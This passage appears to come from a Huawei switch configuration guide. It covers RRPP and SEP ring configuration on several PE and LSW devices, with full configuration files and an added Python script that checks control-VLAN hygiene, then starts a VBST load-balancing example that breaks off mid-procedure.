[PE1-mst-region] instance 1 vlan 5 6 100 //Map VLAN 5, VLAN 6, and VLAN 100 to MSTI 1.
[PE1-mst-region] active region-configuration //Activate the MST region configuration.
[PE1-mst-region] quit
[PE1] rrpp domain 1 //Create RRPP domain 1.
[PE1-rrpp-domain-region1] control-vlan 5 //Configure VLAN 5 as the control VLAN of RRPP domain 1.
[PE1-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure the protected VLAN by referencing instance 1.

# Configure PE2.
[PE2] stp region-configuration //Enter the MST region view.
[PE2-mst-region] instance 1 vlan 5 6 100 //Map VLAN 5, VLAN 6, and VLAN 100 to MSTI 1.
[PE2-mst-region] active region-configuration //Activate the MST region configuration.
[PE2-mst-region] quit
[PE2] rrpp domain 1 //Create RRPP domain 1.
[PE2-rrpp-domain-region1] control-vlan 5 //Configure VLAN 5 as the control VLAN of RRPP domain 1.
[PE2-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure the protected VLAN by referencing instance 1.

# Configure PE3.
[PE3] stp region-configuration //Enter the MST region view.
[PE3-mst-region] instance 1 vlan 5 6 100 //Map VLAN 5, VLAN 6, and VLAN 100 to MSTI 1.
[PE3-mst-region] active region-configuration //Activate the MST region configuration.
[PE3-mst-region] quit
[PE3] rrpp domain 1 //Create RRPP domain 1.
[PE3-rrpp-domain-region1] control-vlan 5 //Configure VLAN 5 as the control VLAN of RRPP domain 1.
[PE3-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure the protected VLAN by referencing instance 1.

# Configure PE4.
[PE4] stp region-configuration //Enter the MST region view.
[PE4-mst-region] instance 1 vlan 5 6 100 //Map VLAN 5, VLAN 6, and VLAN 100 to MSTI 1.
[PE4-mst-region] active region-configuration //Activate the MST region configuration.
[PE4-mst-region] quit
[PE4] rrpp domain 1 //Create RRPP domain 1.
[PE4-rrpp-domain-region1] control-vlan 5 //Configure VLAN 5 as the control VLAN of RRPP domain 1.
[PE4-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure the protected VLAN by referencing instance 1.

NOTE

The control VLAN must be a VLAN that has not been created or used, but the command for creating a
common VLAN is automatically displayed in the configuration file after the control VLAN is created.
2. Create a VLAN and add interfaces on the ring network to the VLAN.
# On PE1, create VLAN 100 and add GE1/0/1, GE1/0/2, and GE1/0/3 to VLAN 100.
[PE1] vlan 100
[PE1-vlan100] quit
[PE1] interface gigabitethernet 1/0/1
[PE1-GigabitEthernet1/0/1] stp disable //Disable STP.
[PE1-GigabitEthernet1/0/1] port link-type trunk
[PE1-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[PE1-GigabitEthernet1/0/1] quit
[PE1] interface gigabitethernet 1/0/2
[PE1-GigabitEthernet1/0/2] stp disable //Disable STP.
[PE1-GigabitEthernet1/0/2] port link-type trunk
[PE1-GigabitEthernet1/0/2] port trunk allow-pass vlan 100
[PE1-GigabitEthernet1/0/2] quit
[PE1] interface gigabitethernet 1/0/3
[PE1-GigabitEthernet1/0/3] stp disable //Disable STP.
[PE1-GigabitEthernet1/0/3] port link-type trunk
[PE1-GigabitEthernet1/0/3] port trunk allow-pass vlan 100
[PE1-GigabitEthernet1/0/3] quit

# On PE2, create VLAN 100 and add GE1/0/1, GE1/0/2, and GE1/0/3 to VLAN 100.
[PE2] vlan 100
[PE2-vlan100] quit
[PE2] interface gigabitethernet 1/0/1
[PE2-GigabitEthernet1/0/1] stp disable //Disable STP.
[PE2-GigabitEthernet1/0/1] port link-type trunk
[PE2-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[PE2-GigabitEthernet1/0/1] quit
[PE2] interface gigabitethernet 1/0/2
[PE2-GigabitEthernet1/0/2] stp disable //Disable STP.
[PE2-GigabitEthernet1/0/2] port link-type trunk
[PE2-GigabitEthernet1/0/2] port trunk allow-pass vlan 100
[PE2-GigabitEthernet1/0/2] quit
[PE2] interface gigabitethernet 1/0/3
[PE2-GigabitEthernet1/0/3] stp disable //Disable STP.
[PE2-GigabitEthernet1/0/3] port link-type trunk
[PE2-GigabitEthernet1/0/3] port trunk allow-pass vlan 100
[PE2-GigabitEthernet1/0/3] quit

# On PE3, create VLAN 100 and add GE1/0/1 and GE1/0/2 to VLAN 100.
[PE3] vlan 100
[PE3-vlan100] quit
[PE3] interface gigabitethernet 1/0/1
[PE3-GigabitEthernet1/0/1] stp disable //Disable STP.
[PE3-GigabitEthernet1/0/1] port link-type trunk
[PE3-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[PE3-GigabitEthernet1/0/1] quit
[PE3] interface gigabitethernet 1/0/2
[PE3-GigabitEthernet1/0/2] stp disable //Disable STP.
[PE3-GigabitEthernet1/0/2] port link-type trunk
[PE3-GigabitEthernet1/0/2] port trunk allow-pass vlan 100
[PE3-GigabitEthernet1/0/2] quit

# On PE4, create VLAN 100 and add GE1/0/1 and GE1/0/2 to VLAN 100.
[PE4] vlan 100
[PE4-vlan100] quit
[PE4] interface gigabitethernet 1/0/1
[PE4-GigabitEthernet1/0/1] stp disable //Disable STP.
[PE4-GigabitEthernet1/0/1] port link-type trunk
[PE4-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[PE4-GigabitEthernet1/0/1] quit
[PE4] interface gigabitethernet 1/0/2
[PE4-GigabitEthernet1/0/2] stp disable //Disable STP.
[PE4-GigabitEthernet1/0/2] port link-type trunk
[PE4-GigabitEthernet1/0/2] port trunk allow-pass vlan 100
[PE4-GigabitEthernet1/0/2] quit

3. Configure PE1 as the master node and PE2 to PE4 as transit nodes on the major ring,
and specify the primary and secondary interfaces of each node.
# Configure PE1.
[PE1] rrpp domain 1 //Enter the view of RRPP domain 1.
[PE1-rrpp-domain-region1] ring 1 node-mode master primary-port
gigabitethernet 1/0/2 secondary-port gigabitethernet 1/0/3 level 0 //
Configure the master node on RRPP primary ring 1 in RRPP domain 1, and
configure GE1/0/2 as the primary interface and GE1/0/3 as the secondary
interface.
[PE1-rrpp-domain-region1] ring 1 enable //Enable the RRPP ring.

# Configure PE2.
[PE2] rrpp domain 1 //Enter the view of RRPP domain 1.
[PE2-rrpp-domain-region1] ring 1 node-mode transit primary-port
gigabitethernet 1/0/2 secondary-port gigabitethernet 1/0/3 level 0 //
Configure the transit node on RRPP primary ring 1 in RRPP domain 1, and
configure GE1/0/2 as the primary interface and GE1/0/3 as the secondary
interface.
[PE2-rrpp-domain-region1] ring 1 enable //Enable the RRPP ring.

# Configure PE3.
[PE3] rrpp domain 1 //Enter the view of RRPP domain 1.
[PE3-rrpp-domain-region1] ring 1 node-mode transit primary-port
gigabitethernet 1/0/1 secondary-port gigabitethernet 1/0/2 level 0 //
Configure the transit node on RRPP primary ring 1 in RRPP domain 1, and
configure GE1/0/1 as the primary interface and GE1/0/2 as the secondary
interface.
[PE3-rrpp-domain-region1] ring 1 enable //Enable the RRPP ring.

# Configure PE4.
[PE4] rrpp domain 1 //Enter the view of RRPP domain 1.
[PE4-rrpp-domain-region1] ring 1 node-mode transit primary-port
gigabitethernet1/0/1 secondary-port gigabitethernet1/0/2 level 0 //Configure
the transit node on RRPP primary ring 1 in RRPP domain 1, and configure
GE1/0/1 as the primary interface and GE1/0/2 as the secondary interface.
[PE4-rrpp-domain-region1] ring 1 enable //Enable the RRPP ring.

4. Enable RRPP.
# Configure PE1.
[PE1] rrpp enable

# Configure PE2.
[PE2] rrpp enable

# Configure PE3.
[PE3] rrpp enable

# Configure PE4.
[PE4] rrpp enable

After the configuration is complete, run the display rrpp brief or display rrpp verbose
domain command to check the RRPP status. PE1 is used as an example.
[PE1] display rrpp brief
Abbreviations for Switch Node Mode :
M - Master , T - Transit , E - Edge , A - Assistant-Edge

RRPP Protocol Status: Enable
RRPP Working Mode: HW
RRPP Linkup Delay Timer: 0 sec (0 sec default)
Number of RRPP Domains: 1

Domain Index : 1
Control VLAN : major 5 sub 6
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)
Ring Ring Node Primary/Common Secondary/Edge Is
ID Level Mode Port Port Enabled
----------------------------------------------------------------------------
1 0 M GigabitEthernet1/0/2 GigabitEthernet1/0/3 Yes

According to the preceding information, RRPP is enabled on PE1; the major control VLAN is
VLAN 5 and the sub-control VLAN is VLAN 6 in RRPP domain 1; VLANs mapping
Instance1 are protected VLANs; PE1 is the master node in ring 1; the primary interface is
GE1/0/2 and the secondary interface is GE1/0/3.
[PE1] display rrpp verbose domain 1
Domain Index : 1
Control VLAN : major 5 sub 6
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

RRPP Ring : 1
Ring Level : 0
Node Mode : Master
Ring State : Complete
Is Enabled : Enable Is Active: Yes
Primary port : GigabitEthernet1/0/2 Port status: UP
Secondary port : GigabitEthernet1/0/3 Port status: BLOCKED

The major control VLAN is VLAN 5 and the sub-control VLAN is VLAN 6 in RRPP domain
1; VLANs mapping Instance1 are protected VLANs; PE1 is the master node in Complete
state; the primary interface is GE1/0/2 and the secondary interface is GE1/0/3.

Step 3 Configure Layer 2 forwarding on the CE, LSW1 to LSW3, and PE1 to PE4.

The configuration details are not described here. For details, see the configuration files
at the end of this example.

Step 4 Verify the configuration.

After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.

# Run the shutdown command on GE1/0/1 of LSW2 to simulate a fault, and then run the
display sep interface command on LSW3 to check whether GE1/0/2 on LSW3 changes from
the discarding state to the forwarding state.
[LSW3] display sep interface gigabitethernet 1/0/2
SEP segment 1
----------------------------------------------------------------
Interface Port Role Neighbor Status Port Status
----------------------------------------------------------------
GE1/0/2 common up forwarding

----End

Configuration Files
l Configuration file of LSW1
#
sysname LSW1
#
vlan batch 10 100
#
sep segment 1
control-vlan 10
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1
#
return

l Configuration file of LSW2
#
sysname LSW2
#
vlan batch 10 100
#
sep segment 1
control-vlan 10
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1
#
return

l Configuration file of LSW3
#
sysname LSW3
#
vlan batch 10 100
#
sep segment 1
control-vlan 10
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 100
#
return
l Configuration file of PE1
#
sysname PE1
#
vlan batch 5 to 6 10 100
#
rrpp enable
#
stp region-configuration
instance 1 vlan 5 to 6 100
active region-configuration
#
rrpp domain 1
control-vlan 5
protected-vlan reference-instance 1
ring 1 node-mode master primary-port GigabitEthernet 1/0/2 secondary-port
GigabitEthernet 1/0/3 level 0
ring 1 enable
#
sep segment 1
control-vlan 10
block port middle
tc-notify rrpp
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1 edge primary
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 5 to 6 100
stp disable
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 5 to 6 100
stp disable
#
return
l Configuration file of PE2
#
sysname PE2
#
vlan batch 5 to 6 10 100
#
rrpp enable
#
stp region-configuration
instance 1 vlan 5 to 6 100
active region-configuration
#
rrpp domain 1
control-vlan 5
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet 1/0/2 secondary-port
GigabitEthernet 1/0/3 level 0
ring 1 enable
#
sep segment 1
control-vlan 10
tc-notify rrpp
protected-instance 0 to 4094
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 100
stp disable
sep segment 1 edge secondary
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 5 to 6 100
stp disable
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 5 to 6 100
stp disable
#
return
l Configuration file of PE3
#
sysname PE3
#
vlan batch 5 to 6 100 200
#
rrpp enable
#
stp region-configuration
instance 1 vlan 5 to 6 100
active region-configuration
#
rrpp domain 1
control-vlan 5
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet 1/0/1 secondary-port
GigabitEthernet 1/0/2 level 0
ring 1 enable
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
stp disable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 5 to 6 100 200
stp disable
#
return
l Configuration file of PE4
#
sysname PE4
#
vlan batch 5 to 6 100 200
#
rrpp enable
#
stp region-configuration
instance 1 vlan 5 to 6 100
active region-configuration
#
rrpp domain 1
control-vlan 5
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet 1/0/1 secondary-port
GigabitEthernet 1/0/2 level 0
ring 1 enable
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
stp disable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 5 to 6 100 200
stp disable
#
return

l Configuration file of CE1
#
sysname CE1
#
vlan batch 100
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
return
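As an added check on the configuration files above (example code written for this page, not Huawei's), the following Python script parses the VRP statements that matter for ring control-plane hygiene and verifies three invariants the example relies on: the RRPP control VLAN and its sub-control VLAN (control VLAN + 1, as the "Control VLAN : major 5 sub 6" output shows) are carried only by the two ring ports; every ring port has stp disable; and a port carries the SEP control VLAN exactly when it is enabled for the SEP segment. A control VLAN that reaches a port outside the ring lets whatever sits on that port inject RRPP or SEP protocol frames into the ring. The embedded input is PE1's configuration file from this page, abridged to the statements the parser reads; the parser understands only those statements and is not a general VRP parser.

```python
"""Audit a VRP configuration file for RRPP/SEP control-VLAN hygiene.
Added example, not Huawei code: a minimal parser for the statements that
appear in the configuration files above, plus the invariant checks."""
import re

# Constructed input: PE1's configuration file from this page, abridged to the
# statements the audit reads (the wrapped 'ring 1 node-mode ...' line is one command).
PE1_CONFIG = """\
stp region-configuration
 instance 1 vlan 5 to 6 100
#
rrpp domain 1
 control-vlan 5
 protected-vlan reference-instance 1
 ring 1 node-mode master primary-port GigabitEthernet 1/0/2 secondary-port GigabitEthernet 1/0/3 level 0
#
sep segment 1
 control-vlan 10
#
interface GigabitEthernet1/0/1
 port trunk allow-pass vlan 10 100
 stp disable
 sep segment 1 edge primary
#
interface GigabitEthernet1/0/2
 port trunk allow-pass vlan 5 to 6 100
 stp disable
#
interface GigabitEthernet1/0/3
 port trunk allow-pass vlan 5 to 6 100
 stp disable
#
"""

def expand_vlans(spec):
    """'5 to 6 100' -> {5, 6, 100}; VRP writes VLAN ranges with 'to'."""
    toks, out, i = spec.split(), set(), 0
    while i < len(toks):
        if i + 2 < len(toks) and toks[i + 1] == "to":
            out.update(range(int(toks[i]), int(toks[i + 2]) + 1))
            i += 3
        else:
            out.add(int(toks[i]))
            i += 1
    return out

def parse_config(text):
    """Collect MSTI->VLAN maps, RRPP domains, SEP segments and interfaces."""
    cfg = {"instances": {}, "rrpp": {}, "sep": {}, "interfaces": {}}
    kind, blk = None, None          # the top-level block currently being read
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line == "#":  # '#' closes a top-level block
            kind = None
        elif line.startswith("interface "):
            blk = cfg["interfaces"].setdefault(line.split()[1], {"vlans": set(), "stp_disable": False, "sep": False})
            kind = "if"
        elif line == "stp region-configuration":
            kind = "region"
        elif line.startswith("rrpp domain "):
            blk, kind = cfg["rrpp"].setdefault(int(line.split()[2]), {"ring_ports": set()}), "rrpp"
        elif line.startswith("sep segment ") and kind != "if":
            blk, kind = cfg["sep"].setdefault(int(line.split()[2]), {}), "sep"
        elif kind == "region" and (m := re.match(r"instance (\d+) vlan (.+)", line)):
            cfg["instances"][int(m.group(1))] = expand_vlans(m.group(2))
        elif kind in ("rrpp", "sep") and (m := re.match(r"control-vlan (\d+)", line)):
            blk["control_vlan"] = int(m.group(1))
        elif kind == "rrpp" and (m := re.match(r"protected-vlan reference-instance (\d+)", line)):
            blk["instance"] = int(m.group(1))
        elif kind == "rrpp" and (m := re.search(r"primary-port (\S+) (\S+) secondary-port (\S+) (\S+)", line)):
            blk["ring_ports"] = {m.group(1) + m.group(2), m.group(3) + m.group(4)}
        elif kind == "if" and (m := re.match(r"port trunk allow-pass vlan (.+)", line)):
            blk["vlans"] |= expand_vlans(m.group(1))
        elif kind == "if" and line == "stp disable":
            blk["stp_disable"] = True
        elif kind == "if" and line.startswith("sep segment "):
            blk["sep"] = True
    return cfg

def audit(cfg):
    """Return findings (an empty list means all invariants hold)."""
    findings, ifaces = [], cfg["interfaces"]
    for dom, d in cfg["rrpp"].items():
        if "control_vlan" not in d:
            continue
        ctrl = {d["control_vlan"], d["control_vlan"] + 1}   # major + sub-control VLAN
        needed = ctrl | cfg["instances"].get(d.get("instance"), set())
        for name, itf in ifaces.items():
            if name in d["ring_ports"]:
                if not itf["stp_disable"]:
                    findings.append(f"{name}: RRPP ring port without 'stp disable'")
                if not needed <= itf["vlans"]:
                    findings.append(f"{name}: ring port must carry VLANs {sorted(needed)}")
            elif ctrl & itf["vlans"]:
                findings.append(f"{name}: RRPP domain {dom} control VLAN leaks to a non-ring port")
    for seg, s in cfg["sep"].items():
        for name, itf in ifaces.items():
            if itf["sep"] != (s.get("control_vlan") in itf["vlans"]):
                findings.append(f"{name}: SEP segment {seg} control VLAN and 'sep segment' must go together")
    return findings

def audit_text(text):
    return audit(parse_config(text))
```

Run audit_text on each PE and LSW file; the page's PE1 file produces no findings, while allowing VLAN 5 on GE1/0/1 or dropping stp disable from a ring port is reported immediately.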

7.10 Example for Configuring VBST

VBST Overview
VLAN-based Spanning Tree (VBST), a Huawei proprietary protocol, constructs a separate
spanning tree in each VLAN so that traffic from different VLANs can be forwarded along
different spanning trees. VBST is equivalent to running the Spanning Tree Protocol (STP) or
Rapid Spanning Tree Protocol (RSTP) independently in each VLAN; the spanning trees of
different VLANs do not affect one another.
There are three standard spanning tree protocols: STP, RSTP, and the Multiple Spanning
Tree Protocol (MSTP). STP and RSTP cannot load balance traffic per VLAN, because all
VLANs on a LAN share one spanning tree and packets of every VLAN are forwarded along it.
The blocked link carries no traffic at all, which wastes bandwidth and may leave packets of
some VLANs with no forwarding path. In practice MSTP is preferred: it is compatible with
STP and RSTP, converges quickly, and provides multiple paths over which traffic can be
load balanced.
Enterprise networks, however, need functions that are easy to use and maintain, whereas
configuring MSTP with multiple instances and multiple processes is complex and demands
highly skilled engineers.
To address this, Huawei developed VBST. VBST constructs a spanning tree in each VLAN so
that traffic from different VLANs is load balanced along different spanning trees, and it is
easy to configure and maintain.

Configuration Notes
When configuring VBST on the switch, pay attention to the following points:
l When VBST is enabled on a ring network, VBST immediately starts spanning tree
calculation. Parameters such as the device priority and port priority affect the
calculation, and changing them afterwards may cause network flapping. To ensure fast
and stable calculation, complete the basic configuration of the switch and its interfaces
before enabling VBST.
l If a protected instance has been configured in a SEP segment or ERPS ring but the
mapping between protected instances and VLANs has not, VBST cannot be enabled.
l VBST cannot be enabled in an ignored VLAN or in a control VLAN used by ERPS, RRPP,
SEP, or Smart Link.
l If a 1:N (N>1) mapping between MSTIs and VLANs has been configured on the switch,
delete the mapping before changing the STP working mode to VBST.
l If stp vpls-subinterface enable has been configured on an interface, run the
undo stp vpls-subinterface enable command on that interface before changing the STP
working mode to VBST.
l If the device has been configured as the root bridge or secondary root bridge, run the
undo stp vlan { vlan-id1 [ to vlan-id2 ] } &<1-10> root command to disable that function
before running the stp vlan { vlan-id1 [ to vlan-id2 ] } &<1-10> priority priority
command to change the device priority.
l When more than 128 MSTIs are dynamically specified, STP is disabled in a newly created
VLAN, and the configuration file records this, for example, stp vlan 100 disable.
l To prevent frequent network flapping, ensure that the values of Hello Time, Forward
Delay, and Max Age satisfy the following formulas:
– 2 x (Forward Delay - 1.0 second) >= Max Age
– Max Age >= 2 x (Hello Time + 1.0 second)
l Fast convergence in normal mode is recommended. In fast mode, frequent deletion of
ARP entries may drive CPU usage of the MPU and LPU to 100%; packet processing then
times out and the network flaps.
l After all ports are configured as edge ports and BPDU filter ports in the system view, no
port on the switch sends BPDUs or negotiates the VBST state with the directly connected
port on the peer device, and all ports are in the forwarding state. This can create loops
and broadcast storms, so use this configuration with caution.
l After a port is configured as an edge port and BPDU filter port in the interface view, the
port neither processes nor sends BPDUs and cannot negotiate the VBST state with the
directly connected port on the peer device. Use this configuration with caution.
l Root protection takes effect only on designated ports.
l An alternate port is the backup of the root port. If a switch has an alternate port,
configure loop protection on both the root port and the alternate port.

Networking Requirements
As shown in Figure 7-12, SwitchC and SwitchD (access switches) are dual-homed to
SwitchA and SwitchB (aggregation switches). SwitchC transmits traffic from VLAN 10 and
VLAN 20, and SwitchD transmits traffic from VLAN 20 and VLAN 30. A ring network is
formed between the access layer and aggregation layer. The enterprise requires that service
traffic in each VLAN be correctly forwarded and service traffic from different VLANs be
load balanced to improve link use efficiency.

Figure 7-12 VBST networking
(Figure not reproduced; its labels are listed here.) Core Network above SwitchA and SwitchB.
SwitchA: GE1/0/1 (VLAN 10, 20, 30), GE1/0/3 (VLAN 10, 20), GE1/0/2 (VLAN 20, 30).
SwitchB: GE1/0/1 (VLAN 10, 20, 30), GE1/0/2 (VLAN 10, 20), GE1/0/3 (VLAN 20, 30).
SwitchC: uplinks GE1/0/3 and GE1/0/2 (VLAN 10, 20); GE1/0/4 (VLAN 10), GE1/0/5 (VLAN 20).
SwitchD: uplinks GE1/0/2 and GE1/0/3 (VLAN 20, 30); GE1/0/4 (VLAN 20), GE1/0/5 (VLAN 30).
Insets: spanning tree for VLAN 10, spanning tree for VLAN 20, spanning tree for VLAN 30.
Legend: root bridge, unblocked link, blocked link, blocked port.

Configuration Roadmap
VBST eliminates loops between the access layer and the aggregation layer, ensures that
service traffic in each VLAN is forwarded correctly, and lets traffic from different VLANs be
load balanced across the links. The configuration roadmap is as follows:

1. Configure Layer 2 forwarding on access and aggregation switches.
2. Configure basic VBST functions on SwitchA, SwitchB, SwitchC, and SwitchD so that the
spanning trees shown in Figure 7-12 are formed by calculation:
– Configure SwitchA as the root bridge and SwitchB as the secondary root bridge in
VLAN 10 and in VLAN 20, and SwitchB as the root bridge and SwitchA as the
secondary root bridge in VLAN 30, so that each VLAN keeps a root bridge if one
aggregation switch fails.
– Set a larger path cost on GE1/0/2 of SwitchC in VLAN 10 and VLAN 20 so that
GE1/0/2 is blocked in the spanning trees of VLAN 10 and VLAN 20, and set a larger
path cost on GE1/0/2 of SwitchD in VLAN 20 and VLAN 30 so that GE1/0/2 is
blocked in the spanning trees of VLAN 20 and VLAN 30.
3. Configure the ports on SwitchC and SwitchD that connect to terminals as edge ports so
that they do not take part in VBST calculation, which speeds up topology convergence.

Procedure
Step 1 Configure Layer 2 forwarding on switches of the ring network.
l Create VLAN 10, VLAN 20, and VLAN 30 on SwitchA, SwitchB, SwitchC, and
SwitchD.
# Create VLAN 10, VLAN 20, and VLAN 30 on aggregation switch SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20 30

# Create VLAN 10, VLAN 20, and VLAN 30 on aggregation switch SwitchB.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 10 20 30

# Create VLAN 10 and VLAN 20 on access switch SwitchC.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] vlan batch 10 20

# Create VLAN 20 and VLAN 30 on access switch SwitchD.
<HUAWEI> system-view
[HUAWEI] sysname SwitchD
[SwitchD] vlan batch 20 30

l Add ports connected to the ring to VLANs.
# Add GE1/0/1 on SwitchA to VLAN 10, VLAN 20, and VLAN 30.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 30
[SwitchA-GigabitEthernet1/0/1] quit

# Add GE1/0/2 on SwitchA to VLAN 20 and VLAN 30.
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 30
[SwitchA-GigabitEthernet1/0/2] quit

# Add GE1/0/3 on SwitchA to VLAN 10 and VLAN 20.
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20
[SwitchA-GigabitEthernet1/0/3] quit

# Add GE1/0/1 on SwitchB to VLAN 10, VLAN 20, and VLAN 30.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type trunk
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 30
[SwitchB-GigabitEthernet1/0/1] quit

# Add GE1/0/2 on SwitchB to VLAN 10 and VLAN 20.
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type trunk
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 20
[SwitchB-GigabitEthernet1/0/2] quit

# Add GE1/0/3 on SwitchB to VLAN 20 and VLAN 30.
[SwitchB] interface gigabitethernet 1/0/3
[SwitchB-GigabitEthernet1/0/3] port link-type trunk
[SwitchB-GigabitEthernet1/0/3] port trunk allow-pass vlan 20 30
[SwitchB-GigabitEthernet1/0/3] quit

# Add GE1/0/2 on SwitchC to VLAN 10 and VLAN 20.
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] port link-type trunk
[SwitchC-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 20
[SwitchC-GigabitEthernet1/0/2] quit

# Add GE1/0/3 on SwitchC to VLAN 10 and VLAN 20.
[SwitchC] interface gigabitethernet 1/0/3
[SwitchC-GigabitEthernet1/0/3] port link-type trunk
[SwitchC-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20
[SwitchC-GigabitEthernet1/0/3] quit

# Add GE1/0/4 on SwitchC to VLAN 10 and GE1/0/5 to VLAN 20.
[SwitchC] interface gigabitethernet 1/0/4
[SwitchC-GigabitEthernet1/0/4] port link-type access
[SwitchC-GigabitEthernet1/0/4] port default vlan 10
[SwitchC-GigabitEthernet1/0/4] quit
[SwitchC] interface gigabitethernet 1/0/5
[SwitchC-GigabitEthernet1/0/5] port link-type access
[SwitchC-GigabitEthernet1/0/5] port default vlan 20
[SwitchC-GigabitEthernet1/0/5] quit

# Add GE1/0/2 on SwitchD to VLAN 20 and VLAN 30.
[SwitchD] interface gigabitethernet 1/0/2
[SwitchD-GigabitEthernet1/0/2] port link-type trunk
[SwitchD-GigabitEthernet1/0/2] port trunk allow-pass vlan 20 30
[SwitchD-GigabitEthernet1/0/2] quit

# Add GE1/0/3 on SwitchD to VLAN 20 and VLAN 30.
[SwitchD] interface gigabitethernet 1/0/3
[SwitchD-GigabitEthernet1/0/3] port link-type trunk
[SwitchD-GigabitEthernet1/0/3] port trunk allow-pass vlan 20 30
[SwitchD-GigabitEthernet1/0/3] quit

# Add GE1/0/4 on SwitchD to VLAN 20 and GE1/0/5 to VLAN 30.
[SwitchD] interface gigabitethernet 1/0/4
[SwitchD-GigabitEthernet1/0/4] port link-type access
[SwitchD-GigabitEthernet1/0/4] port default vlan 20
[SwitchD-GigabitEthernet1/0/4] quit
[SwitchD] interface gigabitethernet 1/0/5
[SwitchD-GigabitEthernet1/0/5] port link-type access
[SwitchD-GigabitEthernet1/0/5] port default vlan 30
[SwitchD-GigabitEthernet1/0/5] quit

Step 2 Configure basic VBST functions.
1. Configure switches on the ring network to work in VBST mode.
# Configure SwitchA to work in VBST mode.
[SwitchA] stp mode vbst

# Configure SwitchB to work in VBST mode.
[SwitchB] stp mode vbst

# Configure SwitchC to work in VBST mode.
[SwitchC] stp mode vbst

# Configure SwitchD to work in VBST mode.
[SwitchD] stp mode vbst

2. Configure the root bridge and secondary root bridge.
– Configure the root bridge and secondary root bridge in VLAN 10.
# Configure SwitchA as the root bridge in VLAN 10.
[SwitchA] stp vlan 10 root primary

# Configure SwitchB as the secondary root bridge in VLAN 10.
[SwitchB] stp vlan 10 root secondary

– Configure the root bridge and secondary root bridge in VLAN 20.
# Configure SwitchA as the root bridge in VLAN 20.
[SwitchA] stp vlan 20 root primary

# Configure SwitchB as the secondary root bridge in VLAN 20.
[SwitchB] stp vlan 20 root secondary

– Configure the root bridge and secondary root bridge in VLAN 30.
# Configure SwitchB as the root bridge in VLAN 30.
[SwitchB] stp vlan 30 root primary

# Configure SwitchA as the secondary root bridge in VLAN 30.
[SwitchA] stp vlan 30 root secondary

3. Configure the path cost of a port in each VLAN so that this port, rather than another, is blocked.
NOTE

– The path cost range depends on the path cost calculation method. The IEEE 802.1t standard is used
here as an example; with it, set the path cost of each port to be blocked to 2000000.
– All switches on the same network must use the same path cost calculation method.
# Set the path cost of GE1/0/2 on SwitchC to 2000000 in VLAN 10 and VLAN 20.
[SwitchC] interface gigabitethernet 1/0/2
[SwitchC-GigabitEthernet1/0/2] stp vlan 10 cost 2000000
[SwitchC-GigabitEthernet1/0/2] stp vlan 20 cost 2000000
[SwitchC-GigabitEthernet1/0/2] quit

# Set the path cost of GE1/0/2 on SwitchD to 2000000 in VLAN 20 and VLAN 30.
